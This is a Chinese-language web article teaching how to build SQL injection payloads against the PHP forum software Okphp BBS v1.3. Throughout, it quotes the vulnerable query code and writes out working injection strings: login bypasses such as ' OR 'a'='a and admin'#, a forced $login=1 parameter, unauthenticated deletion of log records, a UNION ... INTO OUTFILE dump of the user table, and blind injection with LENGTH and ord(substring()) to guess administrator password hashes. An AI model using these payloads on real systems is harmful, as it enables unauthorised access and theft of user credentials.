程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP綜合 >> php 攻擊方法之談php+mysql注射語句構造

php 攻擊方法之談php+mysql注射語句構造

編輯:PHP綜合
一.前言:
  版本信息:Okphp BBS v1.3 開源版

  由於PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困難,尤其是注射時語句的構造方面更是個難點,本文主要是借對Okphp BBS v1.3一些文件得簡單分析,來談談php+mysql注射語句構造方式,希望本文對你有點幫助。
  聲明:文章所有提到的“漏洞”,都沒有經過測試,可能根本不存在,其實有沒有漏洞並不重要,重要的是分析思路和語句構造。
  二.“漏洞”分析:
  1.admin/login.php注射導致繞過身份驗證漏洞:
  代碼:
復制代碼 代碼如下:
  $conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
  $password = md5($password);
  $q = "select id,group_id from $user_table where username='$username' and password='$password'";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);
  $q = "select id,group_id from $user_table where username='$username' and password='$password'"中
  
$username 和 $password 沒過濾, 很容易就繞過。

  對於select * from $user_table where username='$username' and password='$password'這樣的語句改造的方法有:
  構造1(利用邏輯運算):$username=' OR 'a'='a $password=' OR 'a'='a
  相當於sql語句:
  select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
  構造2(利用mysql裡的注釋語句# ,/* 把$password注釋掉):$username=admin'#(或admin'/*)
  即:
  select * from $user_table where username='admin'#' and password='$password'"
  相當於:
  select * from $user_table where username='admin'
  在admin/login.php中$q語句中的$password在查詢前進行了md5加密所以不可以用構造1中的語句繞過。這裡我們用構造2:
  select id,group_id from $user_table where username='admin'#' and password='$password'"
  相當於:
  select id,group_id from $user_table where username='admin'
  只要存在用戶名為admin的就成立,如果不知道用戶名,只知道對應的id,
  我們就可以這樣構造:$username=' OR id=1#
  相當於:
  select id,group_id from $user_table where username='' OR id=1# and password='$password'(#後的被注釋掉)
  我們接著往下看代碼:
復制代碼 代碼如下:
  if ($row[0]) {
  // If not admin or super moderator
  if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
  $login = 0;
  }
  else {
  $login = 1;
  }
  }
  // Fail to login---------------
  if (!$login) {
  write_log("Moderator login","0","password wrong");
  echo " ";
  exit();
  }
  // Access ! -------------
  else {
  session_start();

  最後簡單通過一個$login來判斷,我們只要ie提交直接提交$login=1 就可以繞過了 :)。
  2.users/login.php注射導致繞過身份驗證漏洞:
  代碼:
復制代碼 代碼如下:
  $md5password = md5($password);
  $q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

  $username沒過濾利用同1裡注釋掉and password='$md5password'";

  3.admin\log\list.php存在任意刪除日志記錄漏洞。(ps:這個好象和php+mysql注射無關,隨便提一下)
  okphp的後台好象寫得很馬虎,所有文件都沒有判斷管理員是否已經登陸,以至於任意訪問。我們看list.php的代碼:
復制代碼 代碼如下:
  $arr = array("del_log","log_id","del_id");
  get_r($arr);
  //
  if ($del_log) {
  省略........
  if ($log_id) {
  foreach ($log_id as $val) {
  $q = "delete from $log_table where id='$val'";
  $res = sql_query($q,$conn);
  if ($res) {
  $i++;
  }
  }
  }
  elseif ($del_id) {
  $q = "delete from $log_table where id='$del_id'";
  $res = sql_query($q,$conn);
  }
  $tpl->setVariable("message","$i log deleted ok!");
  $tpl->setVariable("action","index.php?action=list_log");
  }

  代碼就只簡單的用get_r($arr);判斷的提交的參數,我們只要提交相應的$del_log,$log_id,$del_id。就回刪除成功。
  4.多個文件對變量沒有過濾導致sql注射漏洞。
  okphp的作者好象都不喜歡過濾:)。基本上所有的sql語句中的變量都是“赤裸裸”的。具體那些文件我就不列出來了,請自己看代碼,我這裡就用\forums\list_threads.php為例子簡單談一下。
  看list_threads.php的代碼:
復制代碼 代碼如下:
  $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

  變量$forum_id沒有過濾,因為mysql不支持子查詢,我們可以利用union構造語句進行聯合查詢(要求MySQL版本在4.00以上)實現跨庫操作,我們構造如下:
  構造1:利用 SELECT * FROM table INTO OUTFILE '/path/file.txt'(要求mysql有file權限,注意在win系統中要絕對路徑,如:c://path//file.txt )。把所查詢的內容輸入到file.txt,然後我們可以通http://ip/path/file.txt來訪問得到查詢的結果。上面的我們可以這樣構造$forum_id:
  $forum_id=' union select * from user_table into outfile '/path/file.txt'
  以下:
  $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'";
  上面的辦法要求比較苛刻,必須得到web的路徑(一般可以通過提交錯誤的變量使mysql報錯而得到),而且php的magic_gpc=on選項使注入中不能出現單引號。如果magic_gpc=on我們也可以繞過:
  構造2:就象asp跨庫查詢一樣,直接利用union select構造語句,使返回結果不同來猜解,這種方法可以繞過單引號(magic_gpc=on)繼續注射,不過在php裡這種注射相對困難,根據具體的代碼而定。具體的語句構造請參考pinkeyes 的文章《php注入實例》。下面我就結合okphp給個利用“返回結果不同”注射的例子:(見漏洞5)。
  5.admin/login.php和users/login.php通過sql語句構造可以猜解得到指定用戶密碼hash:(其實這個和漏洞1和2是同一個,這裡單獨拿出來,主要是說明語句構造的方法。)
  問題代碼同漏洞1。
  語句的構造(ps:因為語句本身就是對用戶庫操作就沒必要用union了):
  $username=admin' AND LENGTH(password)=6#
  sql語句變成:
  $q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'"
  相當於:
  $q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"
  如果LENGTH(password)=6成立,則正常返回,如果不成立,mysql就會報錯。
  這樣我們就可以猜解用戶admin密碼hash了。如$username=admin' ord(substring(password,1,1))=57#
  可以猜用戶的密碼第一位的ascii碼值............。
  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved